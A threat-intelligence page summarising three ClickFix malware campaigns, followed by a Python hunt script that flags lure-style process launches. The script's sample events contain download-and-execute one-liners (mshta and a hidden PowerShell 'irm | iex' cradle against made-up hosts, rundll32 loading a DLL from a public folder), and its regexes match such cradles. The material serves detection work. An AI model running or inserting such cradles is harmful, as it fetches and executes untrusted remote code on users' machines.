ClickFix

A collection of 3 posts
VodkaStealer Malware Harvests Browser Credentials and Session Token
Malware

Threat Group – Unidentified financially motivated threat actor associated with the ClickFix WordPress compromise campaign
Threat Type – Information Stealer
Exploited Vulnerabilities – ClickFix social engineering using compromised WordPress sites and fake Cloudflare verification prompts
Malware Used – VodkaStealer, DoubleDonut loader, ChromElevator
Threat Score – 🔴 7.6 High – Advanced credential harvesting malware delivered through large
COLDRIVER targets policy and critical infrastructure using BAITSWITCH-SIMPLEFIX chain
COLDRIVER

Threat Group – COLDRIVER
Threat Type – Espionage malware and social engineering
Exploited Vulnerabilities – User execution via ClickFix lure, abuse of rundll32, script execution and registry-based persistence (no CVEs assigned)
Malware Used – BAITSWITCH downloader, SIMPLEFIX PowerShell backdoor, LOSTKEYS VBS payload, SPICA backdoor
Threat Score – 8.2 🔴 High
Last Threat Observation – 25 September
DRAT V2 TAG-140 Bypasses Perimeter Defenses Using Social Engineering and mshta Execution
Malware

Threat Group: TAG-140 / SideCopy / Transparent Tribe (APT36)
Threat Type: Remote Access Trojan (RAT)
Exploited Vulnerabilities: None directly; leverages social engineering and user execution vectors
Malware Used: DRAT V2 (Delphi-compiled) with BroaderAspect.NET Loader
Threat Score: 🟠 Elevated (6.5/10) – Due to its attribution to a state-aligned APT group, arbitrary shell
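The three posts collected here share one delivery pattern: the victim is talked into running a command themselves (the ClickFix lure), and the first process in the chain is a living-off-the-land binary such as mshta.exe, rundll32.exe or PowerShell, launched from the shell the victim pasted into. The hunt below is an added example, not code from any of the posts or the vendors they describe. It scores constructed process-creation events with Sysmon Event ID 1 style field names (ParentImage, Image, CommandLine), and every URL, host and path in the sample data is made up.

```python
import re

# Binaries a ClickFix lure typically has the victim launch; the posts above name
# mshta, rundll32 and PowerShell-based chains.
LURE_INTERPRETERS = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
    "cmd.exe", "wscript.exe", "cscript.exe",
}
# Parents that mean "a human typed or pasted this"; explorer.exe is the Win+R Run dialog.
USER_SHELLS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Download-and-execute cradles and encoded-command switches seen on pasted one-liners.
DOWNLOAD_CRADLE_RE = re.compile(
    r"(?i)\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b"
    r"|\s-e(nc(odedcommand)?)?\s"
)
# Locations an unprivileged user can write to; a DLL loaded from here via rundll32 is a red flag.
USER_WRITABLE_RE = re.compile(
    r"(?i)\\(Users\\Public|ProgramData|Windows\\Temp|Users\\[^\\]+\\AppData|Users\\[^\\]+\\Downloads)\\"
)

# Constructed sample events (Sysmon Event ID 1 style fields). Not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://verify-example.invalid/check.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "irm https://cf-check.invalid/v | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\a.dll,Start"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"ParentImage": r"C:\Program Files\App\updater.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -File "C:\Program Files\App\update.ps1"'},
    # A user simply opening PowerShell from the Run dialog: interpreter and parent
    # match, but there is no cradle, URL or odd DLL, so it must not be flagged.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_event(event: dict) -> dict:
    """Score one process-creation event for the ClickFix first-stage pattern.

    The parent/child pairing is the gate (user shell -> LOLBin); the command
    line must then carry at least one concrete indicator to be flagged, which
    keeps ordinary interactive use of PowerShell or cmd out of the results.
    """
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    if image not in LURE_INTERPRETERS or parent not in USER_SHELLS:
        return {"suspicious": False, "reasons": reasons}
    if URL_RE.search(cmdline):
        reasons.append("remote URL on command line")
    if DOWNLOAD_CRADLE_RE.search(cmdline):
        reasons.append("download/execute cradle or encoded command")
    if image == "rundll32.exe" and USER_WRITABLE_RE.search(cmdline):
        reasons.append("rundll32 loading a DLL from a user-writable path")
    return {"suspicious": bool(reasons), "reasons": reasons}


def hunt(events: list) -> list:
    """Return [{'index': i, 'reasons': [...]}] for every event that is flagged."""
    hits = []
    for i, event in enumerate(events):
        verdict = assess_event(event)
        if verdict["suspicious"]:
            hits.append({"index": i, "reasons": verdict["reasons"]})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["index"], SAMPLE_EVENTS[hit["index"]]["CommandLine"], "->", "; ".join(hit["reasons"]))
```

On a live host the pasted command also survives in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU when the Win+R dialog was used, which is worth collecting alongside the process tree. The regexes key on the cradle, the remote URL and the DLL location rather than on any one domain, because the lure sites in these campaigns rotate; tune USER_SHELLS and LURE_INTERPRETERS to what your fleet actually runs.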